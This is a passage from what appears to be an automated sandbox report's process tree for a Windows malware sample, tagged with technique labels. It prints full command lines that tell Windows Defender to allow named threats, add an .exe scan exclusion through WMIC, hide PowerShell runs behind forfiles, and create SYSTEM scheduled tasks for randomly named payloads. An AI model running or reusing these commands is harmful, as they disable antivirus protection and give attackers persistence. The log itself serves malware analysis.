\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\CFDUcHvi\upQWJmN.exe\" PV /S" /V1 /F3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵
-
C:\ProgramData\explorer.exeC:\ProgramData\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\lgFYjzac\kwxfPer.dll",#1 /LtpFdidHMt 3851211⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\lgFYjzac\kwxfPer.dll",#1 /LtpFdidHMt 3851212⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\CFDUcHvi\upQWJmN.exeC:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\CFDUcHvi\upQWJmN.exe PV /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 12:34:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\xWXuyOQ.exe\" 9Z /S" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "unWjgiOqmrJvCJdsa"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 8282⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\xWXuyOQ.exeC:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\xWXuyOQ.exe 9Z /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\WfqVbX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\BHndidF.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MHiaqjbnoCNpItK"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MHiaqjbnoCNpItK"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\zFPxJkV.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
